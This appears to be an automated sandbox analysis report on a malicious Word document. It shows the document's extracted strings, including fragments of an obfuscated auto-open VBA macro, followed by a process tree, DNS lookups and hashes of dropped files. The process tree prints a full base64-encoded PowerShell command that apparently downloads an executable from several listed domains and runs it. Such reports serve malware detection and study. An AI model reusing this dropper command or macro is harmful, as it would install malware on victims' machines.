open-source GB local area network Unbranded transmitting optimize Senior Michigan mobile Corners Fresh revolutionary Frozen
Switchable deposit Small Granite Chicken Music & Toys Sleek Cotton Salad optical Credit Card Account New Leu forecast Nevada Organic Underpass Forward Garden & Computers
secondary withdrawal Savings Account Unbranded Plastic Bike primary Ethiopian Birr Sleek Borders Organic Kansas Point solid state
background card South Dakota Rustic Rubber Chips Gorgeous Steel Hat Knoll Shoes & Music
CSS cross-platform back-end Licensed UIC-Franc integrate Oklahoma Usability Small Metal Chips Operations Checking Account sticky Buckinghamshire Liaison
array Dynamic Home productize Garden, Health & Clothing Checking Account
Quetzal North Carolina Adaptive payment Fantastic Rubber Chicken Books
transparent North Carolina bifurcated International THX primary Money Market Account Camp
Global Open-architected Intelligent Plastic Salad hardware Sleek Metal Shoes Money Market Account parsing deliver Senior redefine
multi-byte deposit View Practical Rubber Gloves deposit calculate GB Borders transparent Administrator
Fantastic Steel Table Profound Senior Fresh Concrete hard drive Gabon Inlet
infomediaries National online Hawaii Concrete Gorgeous Metal Towels Coordinator Illinois Supervisor
Iceland Krona Nebraska gold Sleek Fresh Ball Savings Account Adaptive solutions Rwanda Parks TCP Ohio Games, Toys & Computers vertical
dynamic Prairie Tools Frozen web-readiness service-desk Throughway Music, Clothing & Outdoors bluetooth Coves invoice
EXE moratorium Forges Idaho transition navigate initiatives Rubber Savings Account calculating
US Dollar Refined Cotton Shoes Minnesota Polarised FTP Officer static virtual Data quantify
Visionary Grass-roots Mauritius Rupee override Home Marketing navigate Bedfordshire Developer Tasty
matrix Berkshire Universal scalable contingency Tasty Wooden Salad Generic Wooden Cheese Movies, Toys & Kids Small Steel Shoes Berkshire Tasty Generic Mall
Consultant Baby & Health repurpose Intelligent Frozen Chair SSL RAM Public-key functionalities Fantastic Cotton Gloves violet
Progressive model cross-media composite invoice Buckinghamshire multi-tasking Kuwait Small Steel Sausages e-business Focused calculate Diverse generating
Engineer Mali Refined Sleek Berkshire Toys cross-platform haptic grow Wooden Village primary Practical Steel Pizza sensor
Fantastic Wooden Salad Enterprise-wide pixel Iranian Rial Nebraska Personal Loan Account Generic Granite Sausages Executive calculating
Yen Kansas sensor Music & Baby reboot Consultant Cambridgeshire Rubber transmit input Personal Loan Account customized
District Executive HDD Money Market Account payment cultivate
Fiji Greens system-worthy synthesize Markets Awesome Soft Shirt proactive Usability calculate Assistant Nevada
synergies override turn-key Soft Costa Rica Sleek Concrete Shoes Buckinghamshire Generic Frozen Hat Graphic Interface
infrastructure intermediate repurpose Legacy Quality driver AGP Generic B2C explicit Awesome
next-generation RSS Avon Bedfordshire backing up Ameliorated Guinea Franc
Forward foreground synthesizing Implemented hack Extension payment neural-net User-centric bricks-and-clicks Cotton Bond Markets Units European Composite Unit (EURCO) azure modular
calculating optical Squares Metical Refined Granite Gloves holistic Handcrafted SQL
iterate Jewelery open system Liaison Avon reinvent Applications Home Loan Account Shoes & Kids transmitting alarm
strategize Games & Garden Supervisor Customer engage CFP Franc Avon Port Networked Rwanda Franc Summit
Kuwaiti Dinar Incredible Wooden Chicken Australia interface metrics Kwacha Liaison Incredible
function Small bypassing HDD Baby User-friendly invoice Handcrafted Soft Ball invoice Automated
global Awesome Rubber Table Handcrafted Steel Shirt 24/365 ivory payment Architect Oman groupware Awesome protocol Sweden Synergistic content
Incredible Soft Cheese Ouguiya bifurcated Designer South Dakota Money Market Account Investment Account
Home grey Pennsylvania Corporate Station Washington
maroon Vision-oriented FTP JBOD Human Extension visualize program task-force Landing Fresh Awesome blue Mongolia
COM Handmade Dominican Peso back-end transparent capacitor connect'
Gorgeous backing up Facilitator Associate SMTP innovative
cross-platform monitoring neural open-source Incredible wireless Avon Investor Republic of Korea tan
payment bus US Dollar Handcrafted Squares Won incubate content quantifying Music, Health & Garden index Awesome Fresh Sausages
mesh content indexing Generic Cotton Sausages Ridges Handcrafted Plastic Tuna harness Legacy Buckinghamshire indexing explicit Incredible Frozen Table North Carolina
next generation white zero defect Botswana Self-enabling scale
communities Assistant Ergonomic Steel Bacon deposit Borders matrix
turquoise service-desk deposit productize Locks Avon niches neural
Northern Mariana Islands partnerships Tools morph PCI back up teal Home Loan Account responsive Licensed Cotton Keyboard
viral Buckinghamshire Ghana Developer deposit COM digital Personal Loan Account Ergonomic Frozen Towels calculate
Personal Loan Account contextually-based connecting Rubber parse Sleek Handmade Rubber Bike Senior complexity Dobra Generic Cotton Table National invoice Internal
visualize firewall Ethiopia Berkshire Arkansas Triple-buffered Bedfordshire Fresh e-business cyan logistical.
Agent bluetooth navigating Auto Loan Account Data Gorgeous Wooden Pants Clothing Home Loan Account quantifying Home Loan Account Customer-focused Incredible Shoes, Jewelery & Booksr
Square bus CFA Franc BEAC Centers 1080p Cotton overriding Handmade Fresh Shirt salmon Graphic Interface Identity
mesh Saint Barthelemy Generic CSS Baby turn-key Incredible Fresh Mouse Antarctica (the territory South of 60 deg S) RSS Fantastic
Unbranded clear-thinking Auto Loan Account Lesotho expedite virtual Mission neural-net Practical Granite Hat parsing Puerto Rico Harbor Cotton contents
gold Creative sensor Visionary circuit River French Guiana Mission Incredible Fresh Chair Human
Future Colorado back-end Grove Bahraini Dinar Unbranded
Way maximize transmit Estate pixel Rustic
Bedfordshire Ergonomic Wooden Bacon Investment Account Fiji Branding migration Metal contentl
grey Home Loan Account generating Awesome Granite Chair Row Gorgeous Concrete Shirt Checking Account syndicate Fresh Buckinghamshire initiatives Handmade Plastic Keyboard
Surinam Dollar copy models Turks and Caicos Islands architectures Investor mobile neural Metal Cambridgeshire
Supervisor success encryption XSS Handcrafted Granite Table maroon software
Accountability RSS International Hryvnia Mission Terrace THX Fantastic Concrete Table Handmade Cotton Salad Executive generating
input Grocery & Outdoors compelling overriding back up Engineer infrastructure productivity
Kwanza Sleek Rubber Keyboard ivory Persevering paradigms PNG Money Market Account Usability primary Handmade Turks and Caicos Islands
transmit Savings Account Cambridgeshire experiences Field schemas El Salvador Unbranded Plastic Chicken payment Rhode Island clicks-and-mortar expedite virtual
deposit US Dollar Brunei Darussalam application Cambridgeshire even-keeled Practical Granite Chicken transparent wireless reboot redundant
Licensed Cotton Chair Borders transmitting Arkansas fault-tolerant Jamaica functionalities
Ireland e-tailers empower Common open architecture payment bluetooth Pennsylvania solutions International input
static Practical Soft Computer blue Unbranded Granite Table Fantastic Granite Shoes Electronics, Computers & Clothing mobile 3rd generation Global
Zambia Open-source New York back-end Florida Optimization Cambridgeshire Operative driver
grow teal Future Granite Avon Cambridgeshire AI COM Burundi Franc Regional Data architect Director Gorgeous
Iceland Krona Bedfordshire Enterprise-wide Investment Account encoding Tasty paradigms Soft
payment internet solution Personal Loan Account yellow Money Market Account Generic Tasty Organic Refined Soft Computer Idaho
Credit Card Account index foreground Agent Agent payment Kansas Awesome Rubber Cheese grey Auto Loan Account'
Small Cotton Gloves Sleek Fresh Hat Ameliorated Managed Generic Soft Bike invoice Metal leverager
Central functionalities Myanmar Ameliorated Corporate Auto Loan Account Buckinghamshire Unbranded Plastic Shoes Practical Metal Tuna enable
fault-tolerant redundant Cotton Triple-buffered Cambridgeshire Fresh Direct Home yellow Licensed Plastic Keyboard Clothing Portst
invoice Bedfordshire Plastic deposit optical EXE"
Assurance incremental Savings Account Health hacking Borders firmware Engineer2
override experiences Forest Missouri calculating Investment Account AI Bedfordshire Course Small Investment Account Computers, Electronics & Sports auxiliary transmitC
Technician Senior Investment Account Islands Buckinghamshire Grocery, Tools & Shoes
Land deposit Implementation silver Hills Handmade Metal Shirt deliverables
Causeway Branding mobile transparent parsing alarm methodical Home Loan Account
initiative Knoll Fresh multi-byte synthesize paradigm Buckinghamshire Principal Tasty Rubber Fish
Saint Martin Communications Refined Plastic Chips Borders Zimbabwe Dollar Malaysian Ringgit
channels auxiliary payment Function-based RAM Kinan
robust Handmade Rubber Gloves Music, Beauty & Toys Director intermediate hacking silver accessr
National microchip Industrial Bedfordshire IB Division Ecuador International Coordinator Assistant
Cambridgeshire Auto Loan Account Yen Fantastic Concrete Chicken Cotton Investment Account array New Hampshire Tools
Dynamic driver Legacy synergy eyeballs Money Market Account
Barbados synergies data-warehouse white Wooden throughput Zimbabwe Avon Pa'anga global open-source'
schemas CSS Awesome Rubber Ball orchid olive Multi-lateral paradigms orange Directives Self-enablingi
Generic capacitor next generation Usability Sleek Metal Bike payment Wooden Rubber Vatu International
transmit back up Guarani Brooks moderator Generic Metal Ball Bedfordshire service-desk core
Buckinghamshire Strategist neural Direct pink Berkshire AI
programming Gorgeous Steel Ball embrace red blue Internal Personal Loan Account solution Ohio Clonedr
synthesizing Total sensor mobile Handcrafted Metal Gloves Parks Small auxiliary FTP
Cambridgeshire wireless HTTP Bedfordshire Jewelery & Electronics Handmade Steel Pants Toys
SQL fuchsia Berkshire Land Licensed Concrete Car Solomon Islands HDD JBOD Afghanistan deposit Cambridgeshire Togo
Cambodia withdrawal protocol withdrawal Supervisor asynchronous focus group model
relationships pixel framework bottom-line grey Avon IB digital distributed indexing quantify Intelligent Cotton Chair transmitting integrated
deposit Kwanza Personal Loan Account User-centric Curve XML framework Mountains Crest Balanced synthesize
Syrian Arab Republic IB Borders white Michigan redundant Lari Summit0
Streamlined Coordinator Developer Fords neutral Auto Loan Account Rapids Money Market Account Clothing, Sports & Games connect monitor seamless infomediaries SMTP
artificial intelligence program markets innovate virtual payment program revolutionize:
SAS Iran pixel River Berkshire Profit-focused Checking Account Awesome Cotton Chair out-of-the-box invoice teal Savings Account EXE Bedfordshire"
Attribut
e VB_Nam
e = "x27
90534112
Funct
ion x909
33c0328(
On Er
'Tenge
Incredi
ble Mead
Tea@m-orie
s, He
alth & G
'quantif
Saving
s Accoun
t USB di
gital cr
oss-plat
form Chi
@ps pro
policy Aweso
Hat Soft
s-based
<6 - x3
'CorpZo
elect C
Dollar I
`Atn(
68651@cb@c`79579
ol@\s
d0epos
sA}ziay`Zs
optim
8Boo0$
#Stee
,T6bA0.-of-b
ews Obje
ct-based
Adaptiv
e Small
panel Vi
etnam te
064003b5
'EXE Mon
ey Marke
t Accoun
t JBOD P
eck del
rables E
l Salvad
x350
= Frozen
Compute r Rep
Vine Ea
st Carib
bean Dol
r Shirt
9mbridg4es
e monit
Z Manda
NMet@QUn,br@$
C hair
y Para
rplFXb0c
70330081
+ x7201
xxP03c)#-'
s s-roo
synthe
2NorIRoa
tto n str
6`<c9832b
Ose b50
c509a
d BT(a
ya$Djibou
ti Franc
c06000
c022x6 =
Kids & T
ools bac
king up
Refined
Plastic
Bacon pa
;Slee@k Rubb
5C@hair t
"Christ
Keyboar
arkways
ers Smal
l Wooden
_ forec
10b8 - x
'leadA
8elligAwS
r(oli
02305
invoic
.5H03x
ro admine
!fp24 h
Supe4rv
*crHaft
Aes lee
j"Kiri
4gra*mA{
ant Norw
egian Kr
c3b43406
xbbb = c
P'Awe
some Fre
sh Shoes
tions Fa
cilitato
mCase b
r deposi
t Delawa
hrW(c519H09x
Common I
wacha t
ransmitt
? budg
etary ma@nageme
Pennsyl
%Sout
ook Gree
ce empowe
'help-d
YBuDck
r l@oyalty
ss Kip*
'490 501x7
,He@x(b068
cH0x0
NLicen2s
erbcDinar
8c6b8565"6
s Produ
P:P3bag
x7130@7b87b3b[c
J \r-
otive &
Music In
credible
transmi
ssion di
ment sil
one-to-
Frozen
Adminis
08404244
0xc = b0
c94b0309
08 - bb9
2'Oreg!
& Kids c
x Mounta
in syste
ms Home
ng Ta
sty Steebl
Future-p
roofed tBe
0 Toys virt
ad Sey
860c6x5@%
Atn(x364
b7x50
#ChrW(bc
n-sour
}n th
Er S8hoa
/@Soap S"@R
Refined
XMetal
Pizza O
77793037
30 = c68
Froze
n Keyboa
iti Del
aware mo
mall Lie
chtenste
& imp
n(c0c4b6
OCheckin
rive vio
3'Chie2f
8up East
Caribbe
ihouse
Por@[c60
ca y
/Mark
ets copy
bFals
c`'bx5906
49426 -
igat@Kyne
b1040
98x01xP
@,t' Pu
bber Bal
l Fresh
ect Case
Stand-al
one inte
grated L icens
t Sausag
es cross
-platfor
m Person
al Loan @Accoun
tive dr
r Isl
Rustic
ppi Po
ialaq
9c2906
70177x4
redible
tems Met
$ccb3
-Atn(b
Gs arrayp Hum
s@@ N
Virtu
'@SSL Ar
Uso Spe
cialist pLari
orange
R Zim
babwe Doa
-PORupe
e Books,
Sports
Case
h'act
ion-item
s Handcr
afted Pl
astic Sh
irt Camb@ridges
clear-t
hinking
Small cr
oss-plat
nthesize
Avon tu rquoi
x00306c5
b03 = Ch
rW(c50c0
-'Mongol
ia Coord
inator U
tah Zimb
( up Ne
w Jersey
oals XM
L supply
iW ooden
paradi"g
IAtn(
ccountNb
I@=ti
rkeyF8b15
8Hex(b58
j 85634Am"C
TCP s
Bx389c2@427685
6rfa 9o
10c90c81S
Omani
U001,xx
$r<uc
Mi n
se c03c1
'Quet
zal Nort
h Caroli
na Adapt
ive paym
ent Fant
astic Ru
bber Chi
ifurcate
d Intern ation
X primar@y Mone
/posit
orgeou
9@&x8831b 012x1L&Ic
s TCP
Ohio Ga
s &@2mpu
#ce-de
ghwa`tusi
9b4020`
nesot
!r st
5&$Bedf`a
4'mat
Pizza
etworked
Rwanda
cx710974
089 = x4
L'Kuwai
ti Dinar
Incredi
ble Wood
Austral
ia inter
face met
rics Kwa
'@functi
mall byp
assing H
DD Baby
User-fri endly
Atn(x920
'globa
l Awesom
l Shirt
24/365 i
vory pay
u Oma
-protHoco
ic co
_Hex(
Cheese O
uth Dako
Penns ylvan
Xgram
557691b0
Oie`J
@!Bo`:rs
Jl Per
`fuchs
dmade Pl
astic Ke
Case x
l'Sur
inam Dol
lar copy
models
Turks an
d Caicos0 Isl
6bile n
Cambri
x32152
695247 =
cess enc
@c464
@Atn(x04
wHryv
alad Exe
Bocery
back
up Engin
wanza Sl
radigms
PNG Mone
7b4L/t
Field
hicken p
fChair PBord
GMa8nagp
c5xb27601x74
'robust
Handmad
e Rubber
Gloves
Music, B
eauty &
Toys Dir
ector in
termedia
ng silv
cb2cxb
00151c =@ Atn(x
'Nationa
hip Ind
b090050
to Loan
Account Yen F
ray New
Legac
y synerg
Cliff
Vthroug
hput Zim
@schem
lti-l
`bbc047
03040 -
b Ca@Vx
pink
"6x 13xc6
Attribut
e VB_Nam
e = "xbb
03077x7x
_B_var_x03900b0xb03+
debug
Function
print
c3062xc6x703N
c084042440xcV
b0069056xb19
x061c763809
x3259902360
0046}#
2.0#0#C:
\Windows
e2.tlb
omation
8D04C-5B
icrosoft
Shared\
OFFICE16
A3-AE60-
rs\ADMIN
I~1\AppD
ata\Loca
ord8.0
x7201320x00
b4228986062c0
x2790534112
xbb03077x7x40
Microsoft Word 97-2003 Document
MSWordDoc
Word.Document.8
<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
&Hzg&Hzg
b015c0394c5
Picture 1
b015c0394c5
Root Entry
WordDocument
ObjectPool
_1632086692
_DELETED_NAME_5
_DELETED_NAME_6
_DELETED_NAME_7
b1661303x905
OCXNAME
contents
_1632086691
_DELETED_NAME_11
_DELETED_NAME_12
OCXNAME
contents
_1632086690
x430489957x
cb0x00141x242
_DELETED_NAME_16
_DELETED_NAME_17
OCXNAME
contents
b80230b09208
_1632086689
_DELETED_NAME_21
_DELETED_NAME_22
OCXNAME
contents
_1632086688
_DELETED_NAME_26
_DELETED_NAME_27
b083b090040
OCXNAME
contents
_1632086687
_DELETED_NAME_31
_DELETED_NAME_32
OCXNAME
contents
1Table
x9060037c40
SummaryInformation
DocumentSummaryInformation
Macros
x7201320x00
b4228986062c0
x2790534112
xbb03077x7x40
_VBA_PROJECT
_DELETED_NAME_46
PROJECT
*\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL#Visual Basic For Applications
*\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB#Microsoft Word 16.0 Object Library
*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\system32\stdole2.tlb#OLE Automation
*\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL#Microsoft Office 16.0 Object Library
*\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\windows\system32\FM20.DLL#Microsoft Forms 2.0 Object Library
*\G{3D3F9F38-A9F3-48A3-AE60-38AE7491F39A}#2.0#0#C:\Users\ADMINI~1\AppData\Local\Temp\Word8.0\MSForms.exd#Microsoft Forms 2.0 Object Library
0x7201320x00
0b4228986062c0
2x2790534112
0xbb03077x7x40
Normal
Default Paragraph Font
Table Normal
No List
PROJECT.X2790534112.AUTOOPEN
Times New Roman
Symbol
Arial
Calibri
Calibri Light
Cambria Math
CompObj
This file is not on VirusTotal.

Process Tree

  • WINWORD.EXE 1224 "C:\Users\user\AppData\Local\Temp\tmpjlr0l6ur.doc" /q
  • explorer.exe 1632
  • svchost.exe 564 C:\Windows\system32\svchost.exe -k DcomLaunch
    • WmiPrvSE.exe 2760 C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
      • powershell.exe 2348 powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJAB4ADEAYgAzAHgAMQA3ADkANgBjADMAPQAnAHgAYwAyADcANQAyADEANQAwADcANQAwADAAJwA7ACQAeAA4ADAAOAB4ADA ...(truncated)
    • WmiPrvSE.exe 2932 C:\Windows\system32\wbem\wmiprvse.exe -Embedding
  • taskhost.exe 2436 "taskhost.exe"

WINWORD.EXE, PID: 1224, Parent PID: 2480
Full Path: C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
Command Line: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" "C:\Users\user\AppData\Local\Temp\tmpjlr0l6ur.doc" /q
splwow64.exe, PID: 3012, Parent PID: 1224
Full Path: C:\Windows\splwow64.exe
Command Line: C:\Windows\splwow64.exe 12288
explorer.exe, PID: 1632, Parent PID: 1496
Full Path: C:\Windows\explorer.exe
Command Line: C:\Windows\Explorer.EXE
svchost.exe, PID: 564, Parent PID: 460
Full Path: C:\Windows\sysnative\svchost.exe
Command Line: C:\Windows\system32\svchost.exe -k DcomLaunch
WmiPrvSE.exe, PID: 2760, Parent PID: 564
Full Path: C:\Windows\sysnative\wbem\WmiPrvSE.exe
Command Line: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
powershell.exe, PID: 2348, Parent PID: 2760
Full Path: C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe
Command Line: powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJAB4ADEAYgAzAHgAMQA3ADkANgBjADMAPQAnAHgAYwAyADcANQAyADEANQAwADcANQAwADAAJwA7ACQAeAA4ADAAOAB4ADAAOQAwAHgAYwAwAGMAYwAgAD0AIAAnADgANQAyACcAOwAkAGMANQBjADgANwAwADgAYgA4ADcANgA4AD0AJwBiADgAMAAwADYAMAAwAGMAOQAwADQAJwA7ACQAYgA4AGIAOAA2ADgAMwAyADAAeAAwAGMAeAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAeAA4ADAAOAB4ADAAOQAwAHgAYwAwAGMAYwArACcALgBlAHgAZQAnADsAJABiADgANQAxADQANgBjADAAOQAxADIAMQA9ACcAeAAwADAAOQA2ADYANgBiADAAMAAwADIAJwA7ACQAeAAxADgAMAB4ADAANQA5AGMAMwBjAGMANwA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwBiAGoAZQAnACsAJwBjAHQAJwApACAATgBlAFQALgBXAGUAYgBDAGwASQBlAE4AVAA7ACQAeAB4ADMAMAA1ADcAMQA3ADAAOQAzAD0AJwBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBzAGsAdQBsAGwAYgBhAGwAaQAuAGMAbwBtAC8AYgBrAC4AdwBwAC0AYwBvAG4AdABlAG4AdAAvADMAMQAxAC8AQABoAHQAdABwADoALwAvAGMAaABlAGUAbQBhAHQAcgBhAG4AcwB4AHAAcgBlAHMAcwBpAG4AYwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AcwBoAG0ANQBkAGoAbAA0ADYAMwA4AC8AQABoAHQAdABwAHMAOgAvAC8AYQBjAGUAbwBuAHQAaABlAHIAbwBvAGYALgBjAG8AbQAvAGkAMABvAG4AaQAvAGcAegB4ADUANQA1ADAALwBAAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBkAGcAeABiAHkAZABhAG0AbwBuAGkAcQB1AGUALgBjAG8AbQAvAGYAcgA0AGoAdAAvAGMAYQBjAGgAZQAvAGkAbgBpAHQALgB1AHAAcABlAHIALwBoADgAOQAxADQALwBAAGgAdAB0AHAAcwA6AC8ALwBhAGEAcABsAGkAbgBkAGkAYQAuAGMAbwBtAC8AaABhAHIAZABlAHIALgBpAG4AYwAvAG8AZAB3ADgAeAB0AGgAOQA2AC8AJwAuACIAcwBgAHAAbABJAFQAIgAoACcAQAAnACkAOwAkAGIAOQAxADIAMAAzAHgANAAxADMAYgBjADAAPQAnAGIAOAA4AHgANAA4ADIAMABjADAAMQAwADYAJwA7AGYAbwByAGUAYQBjAGgAKAAkAGMAMQA4ADMAYgA1ADgAYgB4ADUAYwA3ADIAIABpAG4AIAAkAHgAeAAzADAANQA3ADEANwAwADkAMwApAHsAdAByAHkAewAkAHgAMQA4ADAAeAAwADUAOQBjADMAYwBjADcALgAiAGQAYABPAFcATgBMAE8AYQBgAGQARgBgAEkAbABlACIAKAAkAGMAMQA4ADMAYgA1ADgAYgB4ADUAYwA3ADIALAAgACQAYgA4AGIAOAA2ADgAMwAyADAAeAAwAGMAeAApADsAJAB4AGIAMwA1ADEAMAAwAHgAMwBjADUAMAA9ACcAYgAzADkAMAAyADIAMgAyADEAMAB4ADIAJwA7AEkAZgAgACgAKAAmACgAJwBHAGUAJwArACcAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABiADgAYgA4ADYAOAAzADIAMAB4ADAAYwB4ACkALgAiAGwAYABlAG4ARwBUAEgAIgAgAC0AZwBlACAAMwA4ADUAMgA3ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAVABBAGAAUgBUACIAKAAkAGIAOABiADgANgA4ADMAMgAwAHgAMABjAHgAKQA7ACQAYgA0ADUANgAwAGIAeAAwADIAMgAwADUAPQAnAGMAMAAwADcAMgA2ADUANQAwADEANwAxACcAOwBiAHIAZQBhAGsAOwAkAGIANQAwAHgAMAA3ADkAOQAwADIAMAA0ADcAPQAnAGMANQAwADcAMAAzADAAMQA5ADgANgAwACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAHgAMAA2AGIAYwAzADAAMwAwADYAYgA3AD0AJwBiADgAMAAwADAAeAAxADAAMAA3AGIANgA4ACcA
WmiPrvSE.exe, PID: 2932, Parent PID: 564
Full Path: C:\Windows\sysnative\wbem\WmiPrvSE.exe
Command Line: C:\Windows\system32\wbem\wmiprvse.exe -Embedding
taskhost.exe, PID: 2436, Parent PID: 460
Full Path: C:\Windows\sysnative\taskhost.exe
Command Line: "taskhost.exe"

Hosts

Direct IP Country Name
Y 8.8.8.8 [VT] United States

TCP

No TCP connections recorded.

UDP

Source Source Port Destination Destination Port
192.168.35.21 53447 8.8.8.8 53
192.168.35.21 57255 8.8.8.8 53
192.168.35.21 58094 8.8.8.8 53
192.168.35.21 65365 8.8.8.8 53
192.168.35.21 65426 8.8.8.8 53

DNS

Name Response Post-Analysis Lookup
www.skullbali.com [VT]
cheematransxpressinc.com [VT]
aceontheroof.com [VT]
www.dgxbydamonique.com [VT]
aaplindia.com [VT]

HTTP Requests

No HTTP requests performed.

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No dropped Suricata Extracted files.

JA3

No JA3 hashes found.

File name CVR7204.tmp.cvr
Associated Filenames
C:\Users\user\AppData\Local\Temp\CVR7204.tmp.cvr
File Size 0 bytes
File Type empty
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
CRC32 00000000
Ssdeep 3::
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name Normal.dotm
Associated Filenames
C:\Users\user\AppData\Roaming\Microsoft\Templates\Normal.dotm
File Size 20381 bytes
File Type Microsoft Word 2007+
MD5 23f4c984d111e7c0851f13b5a39e23bf
SHA1 f0b6cf9e53e9b5396275341984cb781ee9c52e80
SHA256 3ade1df494b161cd3616664ccf82d732eea6a648eefe4bfdc285c21be9e51966
CRC32 B554EAE8
Ssdeep 384:Pjl7/J/5ehBcSV+qEPG6yGUTBIOoX4+hD9Qn6eF7y1SFmlEeP:d/JQoG2vX4+hD9IZY
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name ~$Normal.dotm
Associated Filenames
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
C:\Users\user\AppData\Local\Temp\~$pjlr0l6ur.doc
File Size 162 bytes
File Type data
MD5 2275bc9c3694bc9bde8e2a2fb5da3832
SHA1 88ce05eea6654a8cabb88573cb91415574ca7fe6
SHA256 33032fd3a87b547b72715f2ca01298be0495fca9d47062e27e0e52455100183b
CRC32 2E0F17E1
Ssdeep 3:2H/9lyX/3L7YMlbK7g7lxItOFSbl//st/:wVSlxK7ghqOFyct/
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name MSForms.exd
Associated Filenames
C:\Users\user\AppData\Local\Temp\Word8.0\MSForms.exd
File Size 166724 bytes
File Type data
MD5 501d34ba4111ca14fdaa8027dc01ab46
SHA1 49c66fb6dbf1d7b44d73e2657bf7a0ff81106bce
SHA256 cefde0d11ee55f4b7dfdaf2daef6a9f861d15504b159cd0bf840daad3d19f329
CRC32 5DEC5E81
Ssdeep 1536:IQWu6L6wNSc8SetKB4YuiMOqQ/WVMO+O9sOHK7K2xBmsqsDPza7vKp:I+6jNSc83tKBduiMnWOXTK7K1Kp
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name 618D96C.wmf
Associated Filenames
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\618D96C.wmf
File Size 444 bytes
File Type ms-windows metafont .wmf
MD5 02c04320c7f974484ec62b6e8bf9d7ed
SHA1 a4a5ef12b3a3fcd0565f2ed57f4639a42fcbb3b2
SHA256 b2d224dedf3c3cc95cc45cf2672a7fefd7555c93cb8a41e75cf1cf27aa23e80c
CRC32 E707A565
Ssdeep 12:Mh86p058QYNAPzSxsfb0R4EXSvCzSNzztl:O905TZzSWfbUYvnzxl
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name 3843BE5A.wmf
Associated Filenames
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3843BE5A.wmf
File Size 444 bytes
File Type ms-windows metafont .wmf
MD5 c7db039d154512f4b85e912d6f120772
SHA1 a97a5059f5b6d3cdf0e75aacf8f89aa91d3528ee
SHA256 19a212d0eb04f1727bd3307404e8854d85563159d5b36a080b2337308ecc18e6
CRC32 2C282FB8
Ssdeep 12:Mh86p058QYNAPzSxsfb0R4EXSvCzSN9sztl:O905TZzSWfbUYvnCxl
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name 36EA6778.wmf
Associated Filenames
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\36EA6778.wmf
File Size 444 bytes
File Type ms-windows metafont .wmf
MD5 d29ac02ab3757c677a341e6bf161acb2
SHA1 67eee2f9b93d72e117ae3f40c6a781e87cadeaeb
SHA256 abedeba4044399e5c125c3dd96049b59668abfca06640017ac966e8dbb591011
CRC32 7ACD099D
Ssdeep 12:Mh86p058QYNAPzSxsfb0R4EXSvCzSNrcZztl:O905TZzSWfbUYvnrcZxl
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name E846D446.wmf
Associated Filenames
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E846D446.wmf
File Size 444 bytes
File Type ms-windows metafont .wmf
MD5 518b8105450791d4fca69daefb0746af
SHA1 99e669058351a55d939870d5badba567a9d48cae
SHA256 87921e2d1e94f13a69c1af57dc2a2514967649c4c06b03b48f182591688c2c79
CRC32 0BC16C62
Ssdeep 12:Mh86p058QYNAPzSxsfb0R4EXSvCzSNP2ztl:O905TZzSWfbUYvn+xl
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name 8474B044.wmf
Associated Filenames
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8474B044.wmf
File Size 444 bytes
File Type ms-windows metafont .wmf
